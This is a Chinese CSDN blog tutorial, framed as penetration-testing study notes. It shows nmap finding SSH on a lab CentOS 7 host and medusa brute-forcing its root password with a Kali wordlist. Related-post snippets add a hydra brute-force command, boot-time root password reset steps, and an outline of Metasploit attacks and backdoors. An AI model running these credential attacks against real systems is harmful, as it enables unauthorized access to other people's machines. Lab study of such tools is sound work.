Kali利用medusa破解CentOS7的root密码

最新推荐文章于 2024-05-30 16:52:10 发布
置顶 最新推荐文章于 2024-05-30 16:52:10 发布
阅读量3.4k 收藏 33
点赞数 4
分类专栏: 渗透测试学习 文章标签: Kali利用medusa破解CentOS7的root密码
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41709494/article/details/91351712
版权

1.扫描IP地址,查看有哪些开放的端口

root@kali:~# nmap -Pn  172.25.0.12
Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-09 11:36 CST
Nmap scan report for 172.25.0.12
Host is up (1.0s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE
22/tcp open  ssh

2.利用medusa破解ssh

root@kali:~# medusa -M ssh -h 172.25.0.12 -e ns -F -u root -P  /usr/share/wordlists/nmap.lst 

参数:
-M    #攻击模块的执行名称
-h    #攻击IP
-e    #n意为空密码,s意为密码与用户名相同 
-F    #破解到一个正确的密码即退出
-P    #密码字典

/usr/share/wordlists/            #这里是Kali软件自带的密码字典存放路径

 

 3.连接Xshell,验证密码

 

 

 

路来了
关注
  • 4
    点赞
  • 33
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
订阅专栏
暴力破解Centos7并登陆实验,
qq_46258964的博客
06-15 656
环境准备: 1,kali 2,centos7 3,hydra 操作步骤: 1,扫描网段里的目标主机 nmap -sP 192.168.1.1-255 //扫描网段主机 nmap -sS 192.168.1.188 //扫描端口开放情况 扫描到22端口是开着的,进行下一步操作, 2,暴力破解 hydra -l root -P 1.1txt 192.168.1.188 ssh -l ------------------------- 指定用户 -P --------
Kali Linux渗透测试——提权
Captain_RB的博客
03-03 4263
Kali Linux渗透测试——提权 笔记内容参考安全牛苑房弘老师的Kali Linux渗透测试教程 文章目录Kali Linux渗透测试——提权一、关于权限(一)WindowsNT(二)Linux 一、关于权限 对不同的用户设置合适的权限是保证多任务操作系统安全的重要一环,取得shell并拿到系统权限,就相当于完全掌握了攻击目标的控制权。设置用户权限的一个基本原则即:设置最少的服务,分配最小...
Kali修改root密码及更换安装源.txt
05-08
Kali修改root密码及更换安装源
暴力破解medusa美杜莎 hydra海德拉命令详情
最新发布
期待nila
05-30 404
本章借助nmap工具获取了模拟环境下服务端开放的高危端口,通过crunch工具生成了密码字典,通过hydar工具成功破解了服务端的,获取信息
centos7/8/kail密码破解大妈都会
小蔡的博客
04-24 3340
contos7.0系统密码破解 第一步:删除最后一行的rhgb和quiet,加上rd.break enforcing=0 ctrl+x 第二步:(/sysroot只有只读权限加写权限) mount -o remount,rw / sysroot 第3步:改变文件系统类型 chroot /sysroot 第4步: lang=en,passwd 第5步:重新标记所有文件 touch /.autorelabel 第6步:重新改为只读 mount -o remount,ro / exit reboot cont
kali中使用ssh证书通过ssh登录到CentOS7
m0_53499553的博客
04-08 2161
kali中申请私钥和公钥,执行命令:ssh-keygen -t rsa 上面的那个申请公钥和私钥的过程中,Enter passphrase选项和Enter same passphrase again选项是用来设置密码短语的,就是如果你想要在使用证书之前需要输入密码的话,可以去输入设置一下,如果不设置的话,这个密码短语是默认为空的,也就是不使用密码短语,一般情况下,我们在使用这个证书登录的时候是不去设置这个密码短语的 在执行完上面的命令之后,在kali中的/root/.ssh目录下面会多出两个文件,一个
CentOS 7 】密码破解与防破解
欢迎来到Dangks的博客!
11-28 4110
  虚拟机centos7root登录密码破解与防破解:一、密码破解(方法一)①需要挂载 :步骤总结:图文说明:②不需要挂载:步骤总结:图文说明:二、密码破解(方法二)步骤总结:图文说明:三、防破解(grub加密)四、破解grub加密   一、密码破解(方法一)     *方法一又有两种方法,但其实都是一样的,只是其中一个步骤稍微有点区别 ①需要挂载 : 步骤总结: 图文说明: 内核选择界面:启动服务器,进入内核选择界面按 e 进入内核参数编辑界面。 内核参数修改:按⬇找
Kali Linux 网络安全渗透测试
06-02
为什么学网络安全?1. 市场巨大每年各安全厂商收入高达400亿左右,随着5G的发展,万物互联时代,市场将进一步扩大。2. 薪资高网安人才的匮乏,用人开出招聘薪资往往高于求职者的预期。3. 靠能力说话在网络安全专业,专业技能竞争力要远高于学历本身。在网安专业只看能力不看学历也成了大家公认的原则。 网络安全未来10年的发展前景现代人的生活与网络息息相关,个人、企业信息的安全显示尤为重要,2018年报告的信息安全事件比2017年有所增加,一年几千万次。应对网络安全挑战,已越来越被重视。不管你是否从事网络安全行业相关工作,信息安全都显得越来越重要。 注意:视频教学内容仅用于网络安全渗透测试。其他行为,自己承担相应的责任,与作者无关。 
Kali 暴力破解--medusa/hydra/xhydra
xmj818719的博客
03-05 1万+
1 实战-使用 hydra 工具在线破解系统用户密码 2 实战-使用 Medusa 工具在线破解 3 实战-图形化暴力破解软件 xhydra 4 离线破解 md5 值和 shadow 加密文件 环境 Kali Centos7(192.168.0.9) Win7(192.168.0.5) 1 实战-使用 hydra 工具在线破解系统用户密码 内容: 1.1通过WIN7得445端口得smb服务使用hydra进行暴力破解, 1.2通过3389端口得rdp协议破解密码. 1.3通过密码进行远程
kali使用hydra工具进行ssh、ftp等密码爆破
Make
07-23 2万+
简介 hydra破解工具支持多种协议的登录密码,可以添加新组件,使用方便灵活。hydra可在Linux、Windows和OS X中使用。hydra可以用来破解很多种服务,包括IMAP,HTTP,SMB,VNC,MS-SQL,MySQL,SMTP等等 hydra的主要选项(摘自《Kail Linux&BackTrack渗透测试实战》) -R 修复之前使用的aborted/cras...
Linux下centos7如何查看/修改root密码
qq_58392257的博客
04-18 4848
重启计算机并选择CentOS操作系统。在启动过程中按下键盘上的任意键,以停止GRUB菜单的自动加载。按下“e”键进入编辑模式,找到并编辑以“kernel”开头的行,并在行末添加“rd.break”(不含引号),然后按下“Ctrl + X”键。这将进入单用户模式,您将看到一个命令行提示符。
kali重置root密码
07-13
自己在玩渗透测试的时候遇到的问题,root密码重置的具体步骤都在里面
利用kali破解wifi密码全过程.doc
05-21
kali linux 系统利用字典破解wifi密码教程 破解需要强大的字典,而且wifi模式有限制
Mysql 忘记root密码的完美解决方法
09-09
接下来,我们利用这个临时的无密码访问权限来更改root用户的密码。在命令行中输入`mysql`命令,你应该能直接进入MySQL的命令行界面。此时,无需提供密码即可登录。 在MySQL的命令行界面中,执行以下SQL语句来更新...
Kali常见攻击手段
热门推荐
weixin_45565886的博客
02-07 2万+
Kali常见攻击手段
Centos7.X进程管理,攻击流程,信息收集
weixin_44984622的博客
11-02 282
Centos7.X进程管理,攻击流程,信息收集
【Linux 主机ssh远程连接暴力破解详解】
qq_55213436的博客
11-30 1万+
昨天,安全老师布置了一个安全的小作业,在下想了想,做什么好呢?最近学了很多。那就做一个Linux主机远程连接的暴力破解密码的作业。读者请看好,不要睁开你的双杆。 ...
入侵检测与防御——kali+CentOS 7+apache2+php5.4+mariadb
Mydyzdy_的博客
08-20 462
本文为入侵检测与防御课程的期末实验报告。希望自己的实验可以为后续学者做参考。
渗透测试:CentOS 7 环境下 MSF 工具部署(Metasploit 渗透测试框架安装)
zatongtong的博客
01-22 2183
Metasploit 渗透测试框架安装;渗透测试工具 MSF 安装;MSF 升级导致 MSF 环境丢失
kali渗透centos7
03-07
Kali Linux是一种专门用于渗透测试和网络安全的操作系统,而CentOS 7是一种基于Linux的服务器操作系统。在使用Kali Linux进行渗透测试时,你可以通过以下步骤来渗透CentOS 7系统: 1. 信息收集:使用Kali Linux中的工具,如nmap、whois等,对目标CentOS 7系统进行信息收集,包括IP地址、开放端口、服务版本等。 2. 漏洞扫描:使用Kali Linux中的漏洞扫描工具,如OpenVAS、Nessus等,对CentOS 7系统进行漏洞扫描,以发现可能存在的安全漏洞。 3. 密码破解:使用Kali Linux中的密码破解工具,如John the Ripper、Hydra等,对CentOS 7系统的登录凭证进行暴力破解或字典攻击,以获取登录权限。 4. 远程访问:利用Kali Linux中的远程访问工具,如Metasploit、Netcat等,尝试通过已发现的漏洞或弱密码,获取对CentOS 7系统的远程访问权限。 5. 漏洞利用:根据已发现的漏洞,使用Kali Linux中的漏洞利用工具,如ExploitDB、MSFvenom等,对CentOS 7系统进行攻击,以获取更高的权限或执行特定操作。 6. 持久化访问:在成功入侵CentOS 7系统后,使用Kali Linux中的后门工具,如Meterpreter等,以确保持久化访问权限,方便后续的渗透测试或攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

路来了

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值